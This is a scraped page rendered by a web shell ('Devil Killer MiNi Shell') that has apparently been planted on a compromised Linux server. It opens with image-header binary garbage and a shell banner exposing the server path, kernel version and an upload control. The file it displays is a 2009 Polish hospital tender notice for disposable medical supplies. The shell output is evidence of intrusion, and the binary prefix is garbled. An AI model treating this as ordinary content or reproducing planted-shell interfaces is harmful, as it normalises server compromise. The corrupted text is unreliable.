JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090304/45223-N-2009.html

<p class="kh_header"><b>Zgorzelec: dostawy artykułów jednorazowego użytku oraz drobnego sprzętu medycznego</b><br>
<b>Numer ogłoszenia: 45223 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital - Samodzielny Publiczny Zespół Opieki Zdrowotnej w Zgorzelcu , ul. Lubańska 11-12, 59-900 Zgorzelec, woj. dolnośląskie, tel. 075 7722858, faks 075 7750173.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.zgorzelec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy artykułów jednorazowego użytku oraz drobnego sprzętu medycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawy artykułów jednorazowego użytku oraz drobnego sprzętu medycznego - 8 pakietów asortymentowych. Każdy z pakietów musi posiadać wszystkie pozycje asortymentowe, w Wyjątek stanowi pakiet nr 3 i pakiet nr 8 -  w których można składać oferty na poszczególne pozycje asortymentowe.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 39.51.20.00-4, 39.51.80.00-6, 39.51.11.00-8, 33.19.90.00-1, 33.77.12.00-7, 31.71.11.40-6, 33.14.12.00-2, 33.14.16.41-5, 33.14.13.10-6, 44.92.12.00-4, 33.12.14.31-2, 33.16.94.00-6, 33.14.16.40-8, 22.45.41.00-5, 18.42.43.00-0, 44.17.40.00-0, 18.93.00.00-7, 33.13.00.00-0, 33.13.13.00-0, 33.13.16.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 45.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości 15 046,00 zł (słownie: piętnaście  tysięcy czterdzieści sześć złotych 00/100).
Oferty zawierające poszczególne pakiety muszą być zabezpieczone wadium w wysokości odpowiedniej dla poszczególnych pakietów:
NR PAKIETU	KWOTA WADIUM (ZŁ)
1 - 1200,00
2 - 1800,00
3.1 - 7,00
3.2 - 70,00
3.3 - 20,00
3.4 - 40,00
3.5 - 2,00
3.6- 40,00
3.7 -12,00
3.8 - 580,00
3.9- 35,00
3.10 - 25,00
3.11 - 20,00
3.12 - 55,00
3.13 - 155,00
3.14 - 35,00
3.15 - 20,00
3.16 - 20,00
3.17 - 5,00
3.18 - 10,00
3.19- 15,00
3.20 - 20,00
3.21- 10,00
3.22- 120,00
3.23 - 25,00
3.24 - 20,00
3.25 - 25,00
3.26 - 170,00
3.27- 90,00
4 - 1700,00
5 - 350,00
6 - 2000,00
7 - 2500,00
8.1 - 70,00
8.2 - 160,00
8.3 - 190,00
8.4 - 170,00
8.5 - 1500,00
8.6 - 900,00
8.7 - 250,00
8.8 - 40,00
8.9 - 130,00
8.10 - 400,00
8.11 - 10,00
8.12 - 30,00
	2. Wadium może być wniesione na konto:
PKO BP S.A. O/Zgorzelec nr konta 59 1020 2137 0000 9302 0071 3784
w terminie do dnia 16.03.2009r. (decyduje data wpływu wadium na rachunek zamawiającego) w następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3. Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie wykluczony z postępowania o udzielenie zamówienia, a jego oferta zostanie uznana za odrzuconą, zgodnie z art. 24 ust. 2 pkt 4 Ustawy.
4. Warunkiem uznania wniesienia wadium będzie załączony do oferty dokument potwierdzający wniesienie wadium do zamawiającego. W przypadku wniesienia wadium w innej formie niż pieniądz - dokument potwierdzający wniesienie wadium musi zostać złożony w osobnej kopercie, załączonej do oferty. W przypadku trwałego załączenia w.wym. dokumentu do oferty - Zamawiajacy nie zwróci dokumentu Wykonawcy.
5. Zamawiający zwróci niezwłocznie wadium, jeżeli:
1) upłynął termin związania ofertą,
2) została zawarta umowa w sprawie zamówienia publicznego,
3) zostało unieważnione postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
6. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
1) który wycofał ofertę przed upływem terminu składania ofert,
2) który został wykluczony z postępowania,
3) którego oferta została odrzucona.
Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
7. Wadium wniesione w pieniądzu, zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy (także -  Rozdz. VIII, pkt 3 niniejszego SIWZ)  - nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1  - lub pełnomocnictw - chyba  że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia, na podstawie art. 22 ust. 1 pkt 1 - 4, mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Na potwierdzenie tego warunku należy załączyć:
aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. Na potwierdzenie tego warunku należy załączyć:
wykaz wykonanych,wykonywanych dostaw w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartości dostawie stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wykaz musi zawierać co najmniej 3 pozycje - zał. nr 4a do SIWZ - wraz z załączonymi dokumentami potwierdzającymi, że te dostawy zostały wykonane należycie - np. referencje,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.  Na potwierdzenie powyższego należy załączyć:
a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy - w wysokości nie mniejszej niż 100 000 zł, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, zamawiający wymaga złożenia: 
1) oświadczenia , że oferowany przedmiot zamówienia spełnia wymogi: 
a) ustawy z dnia 20 kwietnia 2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896 z późn. zm.) i/lub
b) ustawy z dnia 30 sierpnia 2002 r o systemie oceny zgodności (DZ. U. z 2004 r nr204, poz. 2087 ze zm.) i/lub
c) ustawy z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produktów (Dz. U z 2003 r Nr 229, poz. 2275 ze zm.)  - zależnie od przewidzianego przez wytwórcę przeznaczenia wyrobu
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany jest przesłać dokumenty potwierdzające spełnienie powyższego wymogu w terminie 3 dni od daty zawiadomienia Wykonawcy o wyborze jego oferty.
W przypadku gdy przedmiot zamówienia nie wymaga spełniania powyższego warunku należy wyraźnie zaznaczyć to w składanej ofercie.
2) aktualny katalog  oferowanych produktów będących przedmiotem zamówienia, wraz z nazwą producenta i numerem katalogowym z dokładnym opisem, których pozycji dotyczy - jeżeli Wykonawca go posiada.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt VIII przedmiotowego postępowania oświadczeń i dokumentów, wg formuły:spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Złożona oferta musi zawierać prawidłowo wypełnione i aktualne następujące dokumenty i oświadczenia:
a) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  wraz z (PEŁNOMOCNICTWEM LUB UPOWAŻNIENIEM) osób podpisujących ofertę, o ile nie wynika ono z innych ustaw lub dokumentów przywołanych lub załączonych do oferty 
W przypadku gdy Wykonawcę reprezentuje PEŁNOMOCNIK, należy załączyć do oferty ORYGINAŁ PEŁNOMOCNICTWA do działania w imieniu Wykonawcy lub notarialnie potwierdzony odpis pełnomocnictwa.
b) Wykaz wykonanych/wykonywanych  dostaw w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartości dostawie stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wykaz musi zawierać co najmniej 3 pozycje - zał. nr 4a do SIWZ - wraz z załączonymi dokumentami potwierdzającymi, że te dostawy zostały wykonane należycie - np. referencje. 
c) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, potwierdzające wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy - w wysokości nie mniejszej niż 100 000zł, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
d) Oświadczenie, że oferowany przedmiot zamówienia spełnia wymogi: 
- ustawy z dnia 20 kwietnia 2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 896 z późn. zm.) i/lub
- ustawy z dnia 30 sierpnia 2002 r o systemie oceny zgodności (DZ. U. z 2004 r nr204, poz. 2087 ze zm.) i/lub
- ustawy z dnia 12 grudnia 2003 r. o ogólnym bezpieczeństwie produktów (Dz. U z 2003 r Nr 229, poz. 2275 ze zm.)  - zależnie od przewidzianego przez wytwórcę przeznaczenia wyrobu
Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany jest przesłać dokumenty potwierdzające spełnienie powyższego wymogu w terminie 3 dni od daty zawiadomienia Wykonawcy o wyborze jego oferty.
W przypadku gdy przedmiot zamówienia nie wymaga spełniania powyższego warunku należy wyraźnie zaznaczyć to w składanej ofercie.
e) aktualny katalog  oferowanych produktów będących przedmiotem zamówienia, wraz z nazwą producenta i numerem katalogowym z dokładnym opisem, których pozycji dotyczy - jeżeli Wykonawca go posiada,
f) Wypełniony formularz oferty - zał. nr 2 do SIWZ,
g) Wypełniony formularz cenowy wraz z opisem przedmiotu zamówienia - zał. nr 3 do SIWZ 
h) Oświadczenie o spełnianiu warunków zawartych w art. 22 ust. 1 ustawy prawo zamówień publicznych - zał. nr 4 do SIWZ, 
i) Umowy spółki cywilnej - wraz z wszystkimi aneksami, jeżeli działalność gospodarcza przedsiębiorców jest prowadzona w formie spółki cywilnej,
j) Dowód wniesienia wadium - z dopiskiem PRZETARG  - JEDNORAZÓWKA 2 
W przypadku wniesienia wadium w innej formie niż pieniądz - dokument potwierdzający wniesienie wadium musi zostać złożony w osobnej kopercie, załączonej do oferty. W przypadku trwałego załączenia w/wym. dokumentu do oferty - Zamawiajacy nie zwróci dokumentu Wykonawcy.
2 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa wyżej 
w punkcie 1.a- składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
2.4 nie otwarto jego likwidacji ani nie ogłoszono upadłości - aktualny dokument oznacza dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
2a. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty w ten sposób wystawione muszą być wystawione z zachowaniem terminów określonych w pkt. 2.
      Dopuszcza się przedstawienie kopii w/w dokumentów pod warunkiem poświadczenia ich zgodności z oryginałami przez wykonawcę. (Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu - w przypadku, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzoz.zgorzelec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Osobiście - Wielospecjalistyczny Szpital - SPZOZ w Zgorzelcu, Dział Zamówień Publicznych ul. Lubańska 11-12, 59-900 Zgorzelec w cenie 12,00 zł brutto lub za zaliczeniem pocztowym - 73,46 zł brutto.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 12:00, miejsce: Wielospecjalistyczny Szpital - Samodzielny Publiczny Zespół Opieki Zdrowotnej w Zgorzelcu, Dział Zamówień Publicznych pok 8, ul. Lubańska 11-12, 59-900 Zgorzelec, I piętro biurowca..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 1-  bielizna i pościel - 13 pozycji asortymentowych. Wymagane złożenie oferty na wszystkie pozycje asortymentowe.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.20.00-4, 39.51.80.00-6, 39.51.11.00-8, 33.19.90.00-1, 33.77.12.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 2 - elektrody i żele - 12 pozycji asortymentowych. wymagane złożenie oferty na wszystkie pozycje asortymentowe..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.71.11.40-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.1 -  cewnik donosowy CPAP - 30 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 3.2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.2- olej sterylny w sprayu do konserwacji narzędzi laparoskopowych i artroskopowych -  80 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 3.3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.3 - opaska do rurki tracheoskopijnej - 100 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 3.4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.4  - rurka intubacyjna do mikrochirurgii krtani - szt 80.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 3.5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.5 - sonda do odsysacza - 200 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.41-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 3.6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.6 - strzykawka locko fitting - 200 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 3.7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.7 - wapno medyczne do 5litr - 40 szt.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.92.12.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet nr 3.8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.8 - paski do glukometru Glukotrend- 700 op..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 3.9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.9 - paski do glukometru - Sensoelektrode - 30 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 3.10.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.10 - paski do glukometru One Touch- 20 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 3.11.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 3.11- paski do glukometru Smart Scan - 20 op.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
